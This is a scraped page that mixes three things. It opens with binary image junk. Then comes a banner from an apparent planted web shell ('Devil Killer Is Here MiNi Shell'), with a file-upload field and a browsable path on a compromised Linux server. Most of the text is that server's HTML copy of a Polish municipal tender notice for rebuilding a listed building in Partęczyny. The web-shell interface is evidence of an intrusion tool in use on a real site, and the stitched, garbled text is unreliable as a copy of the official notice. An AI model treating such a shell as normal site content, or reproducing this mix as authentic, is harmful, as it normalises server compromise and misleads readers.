JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250603/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250603/0026034701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa wraz z rozbudową czworaku w zespole podworskim w Partęczynach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIECIE NAD OSĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118678</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świecie nad Osą 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świecie nad Osą</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-341</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">56/466-16-13</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">56/466-16-21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@swiecienadosa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swiecienadosa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa wraz z rozbudową czworaku w zespole podworskim w Partęczynach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ade0b662-61c8-4886-9256-0cb4c488ce13</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00260347</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00071289/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa wraz z rozbudową czworaku w zespole podworskim w Partęczynach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/swiecienadosa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu odbywa się przy użyciu środków komunikacji<br/>elektronicznej, za pomocą platformy zakupowej https://platformazakupowa.pl/pn/swiecienadosa<br/>W korespondencji kierowanej do Zamawiającego, jak i przy składaniu oferty, Wykonawca winien posługiwać się nazwą i numerem sprawy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że w zakresie<br/>pytań dotyczących funkcjonowania platformy zakupowej należy się kontaktować z Centrum Wsparcia Klienta<br/>https://platformazakupowa.pl/ pod numer 22 101 02 02, cwk@platformazakupowa.pl;<br/>Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl/ dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>https://platformazakupowa.pl/ znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/instrukcje-wykonawca.<br/>Zamawiający określa minimalne wymagania sprzętowo - aplikacyjne umożliwiające prace na platformie zakupowej:<br/>odbioru dsnych za pośrednictwem https://platformazakupowa.pl/ , tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar,<br/>h) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z https://platformazakupowa.pl/ określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący;<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków.<br/>Ofertę, oświadczenia, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Gmina Świecie nad Osą z siedzibą w<br/>Świeciu nad Osą 1, 86-341 Świecie nad Osą, adres e-mail: gmina@swiecienadosa.pl, tel.: 56 466-16-13.<br/>2. Inspektor Ochrony Danych<br/>Administrator wyznaczył Inspektora Ochrony Danych (IOD), z którym można się skontaktować w sprawach dotyczących ochrony<br/>danych osobowych, w tym realizacji przysługujących Pani/Panu praw.<br/>adres korespondencyjny: Gmina Świecie nad Osą, Świecie nad Osą 1, 86-341 Świecie nad Osą, adres e-mail:<br/>iodo@swiecienadosa.pl<br/>Więcej informacji w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IROŚ.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa wraz z rozbudową budynku wielorodzinnego - czworaku w zespole podworskim<br/>„Babki” nr 26 w Partęczynach, który wpisany jest do Wojewódzkiej Ewidencji Zabytków oraz ujęty został w Gminnej<br/>Ewidencji Zabytków. Inwestycja polegać będzie na:<br/>wykonaniu nowych schodów zewnętrznych prowadzących do wejść do budynku oraz wymianie schodów technicznych<br/>prowadzących na strych wraz z balustradą (H – 90cm) oraz pomieszczenia pod schodami zewnętrznymi prowadzącymi na<br/>poddasze,<br/>wymianie więźby dachowej i pokrycia dachowego na blachę falistą (kolor pokrycia – szary),<br/>wymianie tynków zewnętrznych na tynki strukturalne 0,1 mm (elewacja – NCS S1502Y),<br/>wymianie zadaszenia nad wejściami na systemowe szklane,<br/>poprowadzeniu nowych przewodów wentylacyjnych do mieszkań, które ich nie posiadały,<br/>ujednoliceniu stolarki oraz otworów okiennych,<br/>przebudowie kominów istniejących,<br/>wymianie podłoża na poddaszu oraz izolacji,<br/>wymianie obróbek blacharskich oraz orynnowaniu dachu.<br/>Szczegółowy opis zakresu robót oraz technologie ich wykonania określają następujące dokumenty:<br/>1) Wzór umowy,<br/>2) Przedmiar robót,<br/>3) Dokumentacja projektowa,<br/>Zamawiający dodatkowo wyjaśnia, że w każdym przypadku użycia w opisie przedmiotu zamówienia odniesień do norm,<br/>ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2<br/>oraz ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub<br/>równoważne”, o ile zapewnią uzyskanie parametrów technicznych oraz bezpieczeństwa użytkowania podobnych lub<br/>lepszych od założonych, pod warunkiem, że wykonawca udowodni w ofercie, iż proponowane rozwiązania w równoważnym<br/>stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45211340-4 - Roboty budowlane w zakresie budownictwa wielorodzinnego</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>4) Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w niniejszym<br/>postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną robotę budowlaną<br/>polegającą na wykonaniu robót budowlanych remontowych lub konserwatorskich w obiektach objętych prawną ochroną<br/>konserwtorską przez wpis do ewidencji lub rejestru zabytków o wartości nie mniejszej niż 200 000,00 zł brutto.<br/>Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego<br/>kursu NBP na dzień publikacji ogłoszenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych:<br/>1) w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne<br/>odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (załącznik nr 1 do SWZ) oraz pozostałe dokumenty, dla których<br/>Zamawiający określił wzory w formie załączników do SWZ winny być sporządzone zgodnie<br/>z tymi wzorami co do ich treści. Oferta musi odpowiadać treści SWZ.<br/>2. Ofertę składa się na Formularzu ofertowym – Załącznik nr 1 do SWZ.<br/>3. Wraz z ofertą Wykonawca jest zobowiązany złożyć aktualne na dzień składania ofert oświadczenia o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 i nr 3 do SWZ;<br/>Oświadczenia stanowią dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, na<br/>dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia<br/>o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składa każdy<br/>z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. W przypadku, o którym mowa w Rozdziale 8 ust. 4 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy. Oświadczenie złożyć należy wg wymogów załącznika Nr 4 do SWZ.<br/>6. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz<br/>z oświadczeniem własnym, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów .<br/>7. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:<br/>5.000,00 zł (słownie: pięć tysięcy zł 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych<br/>c) gwarancjach ubezpieczeniowych<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2025r.,<br/>poz. 98).<br/>3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert<br/>i utrzymuje nieprzerwalnie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.<br/>1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>4. W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na<br/>rachunek bankowy Zamawiającego – Gmina Świecie nad Osą Nr 21 9500 0008 0000 0752 2000 0070 tytułem: „Wadium -<br/>Przebudowa wraz z rozbudową czworaku w zespole podworskim<br/>w Partęczynach”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku<br/>bankowym Zamawiającego (decyduje data i godzina wpływu środków na rachunek Zamawiającego).<br/>Wadium wnoszone w formie gwarancji lub poręczenia, należy przekazać Zamawiającemu w formie<br/>oryginału gwarancji lub poręczenia, w postaci elektronicznej - przed upływem składania ofert.<br/>W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia, z treści dokumentu<br/>gwarancji lub poręczenia winno wynikać bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie zgłoszone<br/>przez Zamawiającego (w terminie związania ofertą), zobowiązanie Gwaranta/Poręczyciela do wypłaty Zamawiającemu<br/>pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>5. W przypadku wnoszenia wadium w gwarancjach lub poręczeniach, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, w treści tych gwarancji i poręczeń muszą być wymienieni<br/>wszyscy wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia w postępowaniu pn. „Przebudowa wraz z rozbudową czworaku w zespole podworskim w<br/>Partęczynach” lub treść tych gwarancji lub poręczeń musi wskazywać, że wykonawca wymieniony w tych gwarancjach lub<br/>poręczeniach działa także w imieniu i na rzecz pozostałych wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy wspólnie złożyli lub złożą ofertę w postępowaniu po to, aby gwarant lub poręczyciel mógł prawidłowo<br/>zidentyfikować, kto jest wykonawcą w postępowaniu.<br/>6. Zatrzymanie i zwrot wadium następuje na zasadach określonych w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Do oferty należy dołączyć pełnomocnictwo, podpisane przez ustanowionego pełnomocnika, z którego będzie wynikać<br/>zakres umocowania.<br/>4. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem jako reprezentantem<br/>wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/>5. Przed zawarciem umowy w sprawie udzielenia zamówienia, Zamawiający żąda 